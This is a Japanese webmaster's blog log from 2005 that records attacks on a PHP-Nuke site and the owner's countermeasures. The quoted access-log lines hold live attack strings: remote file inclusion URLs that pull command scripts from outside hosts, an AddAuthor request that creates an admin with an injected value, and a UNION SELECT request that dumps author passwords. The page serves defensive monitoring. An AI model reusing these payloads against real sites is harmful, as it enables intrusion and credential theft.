不正アクセスの記録

気ままに時々チェック♪

11/Oct/2005 意味不明


host216.200-82-96.telecom.net.ar
[11/Oct/2005:05:26:43 +0900] "GET /modules.php?name=News&file=article&sid=545 HTTP/1.1" 200 6505 "http://www.google.com.ar/search?hl=es&q=inurl:"modules.php?name="+site:.jp&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
[11/Oct/2005:05:26:57 +0900] "POST /admin.php HTTP/1.1" 200 73 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
[11/Oct/2005:05:27:11 +0900] "OPTIONS / HTTP/1.1" 200 12791 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"
[11/Oct/2005:05:27:12 +0900] "GET /_vti_inf.html HTTP/1.1" 404 1049 "-" "Mozilla/4.0 (compatible; MS FrontPage 6.0)"
[11/Oct/2005:05:27:13 +0900] "POST /_vti_bin/shtml.exe/_vti_rpc HTTP/1.1" 404 1063 "-" "MSFrontPage/6.0"
[11/Oct/2005:05:27:14 +0900] "GET /_vti_inf.html HTTP/1.1" 404 1049 "-" "Mozilla/4.0 (compatible; MS FrontPage 6.0)"
[11/Oct/2005:05:27:14 +0900] "POST /_vti_bin/shtml.exe/_vti_rpc HTTP/1.1" 404 1063 "-" "MSFrontPage/6.0"
[11/Oct/2005:05:27:16 +0900] "OPTIONS / HTTP/1.1" 200 12791 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"

modules.php?nameで検索後、POSTでadmin.phpにアクセス(73byteということなので、チェックでdieされてる模様)
そのあとMicrosoft Data Access Internet Publishing Provider Protocol DiscoveryというものにUser Agentが変わり
次はMS FrontPage 6.0
・・・・
小人さんへの置き手紙にMicrosoft Data Access Internet Publishing Provider Protocol Discoveryについての記述がありますが、うちの場合、admin.phpにPOSTでアクセスされた直後なので、故意に何かをやってるような気がしますが、なんのつもりかは不明です。
その他
Forums/admin/へのアクセス3件
admin.phpへのアクセス2件

30/Sep/2005


Forums/admin/admin_styles.php関連が 3件

29/Sep/2005


Forums/admin/admin_styles.php関連が 2件
admin.php?op=AddAuthor 関連が1件

28/Sep/2005 admin.php AddAuthorの脆弱性


80.191.88.6 - - [28/Sep/2005:07:20:51 +0900] "GET /admin.php?op=AddAuthor &add_aid=catc0nfig&add_name=God&add_pwd=654321 &add_email=catc0nfig@hotmail.com&add_radminsuper=1 &admin=eCcgVU5JT04gU0VMRUNUIDEvKjox HTTP/1.0" 200 40 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

27/Sep/2005 coppermineの脆弱性への攻撃

coppermineインストールしていないので 404エラー
特に検索で来ているわけでもないので、これもリストに登録済み?
radios.netwaybbs.com.br - - [27/Sep/2005:12:53:11 +0900] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://go0gler.com/cmd.gif?&cmd=id HTTP/1.1" 404 1125 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
radios.netwaybbs.com.br - - [27/Sep/2005:12:53:15 +0900] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://go0gler.com/cmd.gif?&cmd=id HTTP/1.1" 404 1125 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

27/Sep/2005 phpBB/admin/の脆弱性への攻撃


rev-200-40-117-134.netgate.com.uy - - [27/Sep/2005:09:40:04 +0900] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.brasilhoster.net/~outlaw/cmd/tool25.dat?&list=1&cmd=id HTTP/1.1" 401 409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
rev-200-40-117-134.netgate.com.uy - - [27/Sep/2005:09:40:13 +0900] "GET /favicon.ico HTTP/1.1" 200 3638 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
rev-200-40-117-134.netgate.com.uy - - [27/Sep/2005:09:40:35 +0900] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.brasilhoster.net/~outlaw/cmd/tool25.dat?&list=1&cmd=id HTTP/1.1" 401 409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"

25/Sep/2005 コピーライトで検索後、admin.phpにアクセス

こちらのアップデートを実施していれば防げます。
admin.phpにはIP制限を用心のためこそっと仕込んでいますが、うまく機能しているかどうかは・・・・はてさて
あとmainfile.phpで$_GETがhttp://を含むような場合はdieしてます。
221.212.50.53 - - [25/Sep/2005:11:23:27 +0900] "GET /modules.php?name=News&subcno=&file=categories& op=newindex&catid=1 HTTP/1.1" 200 8013 "http:// www.google.com/search?q=Copyright+by+All+ Rights+Reserved+"PHP+Nuke"+site:.jp &hl=zh-CN&lr=&newwindow=1&start=30&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; TencentTraveler )"
221.212.50.53 - - [25/Sep/2005:11:24:48 +0900] "GET /admin.php HTTP/1.1" 200 54 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; TencentTraveler )"
221.212.50.53 - - [25/Sep/2005:11:33:08 +0900] "GET /admin.php HTTP/1.1" 200 54 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; TencentTraveler )"

25/Sep/2005 phpBB/admin関連

21/Sep/2005のものとIP同じですね
この方検索もなにもなしで、直接このアクセスをしているので攻撃リストに登録済み?とりあえずbanned.txtに追加しておきました。
200.164.108.163 - - [25/Sep/2005:10:42:05 +0900] "GET /ap//modules/Forums/admin/admin_styles.php? phpbb_root_path=http://www.groupiys.net/cmd.txt?&cmd=id

23/Sep/2005 コピーライトで検索後、admin.phpの脆弱性への攻撃


こちらのアップデートを実施していれば防げます。
85.103.23.15 - - [23/Sep/2005:22:57:28 +0900] "GET /modules.php?name=Forums&file=viewtopic&t=155 HTTP/1.1" 200 8196 "http://search.yahoo.com/search?_adv_prop=web&ei=UTF-8 &va=Web+site+engine's+code+is+Copyright+息+2002+by+PHP-Nuke&va_vt=any &vst=0&vf=all&vm=i&vc=countryJP&fl=0&n=10&fr=FP-tab-web-t&b=21" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
85.103.23.15 - - [23/Sep/2005:22:57:44 +0900] "GET /admin.php?op=AddAuthor&add_aid=wada&add_name=God &add_pwd=111111&add_email=foo@bar.com&add_radminsuper=1& admin=eCcgVU5JT04gU0VMRUNUIDEvKjox HTTP/1.1" 200 53 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
85.103.23.15 - - [23/Sep/2005:22:58:42 +0900] "GET /modules.php?name=Surveys&pollID=2 HTTP/1.1" 200 4663 "http://search.yahoo.com/search?_adv_prop=web&ei=UTF-8 &va=Web+site+engine's+code+is+Copyright+息+2002+by+PHP-Nuke&va_vt=any& vst=0&vf=all&vm=i&vc=countryJP&fl=0&n=10 &fr=FP-tab-web-t&b=31" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
85.103.23.15 - - [23/Sep/2005:22:59:10 +0900] "GET /admin.php?op=AddAuthor&add_aid=wada&add_name=God &add_pwd=111111&add_email=foo@bar.com&add_radminsuper=1 &admin=eCcgVU5JT04gU0VMRUNUIDEvKjox HTTP/1.1" 200 53 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"

22/Sep/2005

phpBB/admin/の脆弱性への攻撃

201.19.160.142 - - [22/Sep/2005:19:33:46 +0900] "GET //modules/Forums/admin/admin_styles.php? phpbb_root_path=http://go0gler.com/cmd.gif?& cmd=id HTTP/1.1" 401 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

21/Sep/2005 コピーライトで検索後、unionを使った攻撃


nukeインストール時にテーブルのプリフィックスをnuke以外にしておくととりあえず安心ですね。インストール時にガイドがあるといいかも♪
同様のアクセスが以前Downloadsモジュールでもありました。Web_linksとDownloadsは同じ作りになっているので穴も同じようにあいているのでしょう・・・。
とりあえず viewlinkcomments.phpのintval処理を確認。
80.242.7.17 - - [21/Sep/2005:06:42:45 +0900] "GET /modules.php?name=News&file=article&sid=921 HTTP/1.0" 200 20583 "http://www.google.com/search?q=powered+by+php-nuke+ 1.4&hl=en&lr=&start=180&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.242.7.17 - - [21/Sep/2005:06:42:56 +0900] "GET /modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1 UNION SELECT aid,1,pwd,1 FROM nuke_authors /* HTTP/1.0" 200 13285 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

21/Sep/2005 phpBB/adminの脆弱性への攻撃


phpBBはソースをトレースするのが困難というか面倒なので、Forums/adminには.htaccessでBasic認証入れてます。ちゃんと401エラーになってますね。
200.164.108.163 - - [21/Sep/2005:06:33:17 +0900] "GET //modules/Forums/admin/admin_styles.php? phpbb_root_path=http://www.megahostbr.com/a1ts/cse.gif? &cmd=id HTTP/1.0" 401 397 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"


[ 戻り先 WWW | セクションのトップページ ]

このページの先頭へ

サイト内検索

最新のコメント

Link

トピックス

Copyright - © tae since 2000.11 All Rights Reserved
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.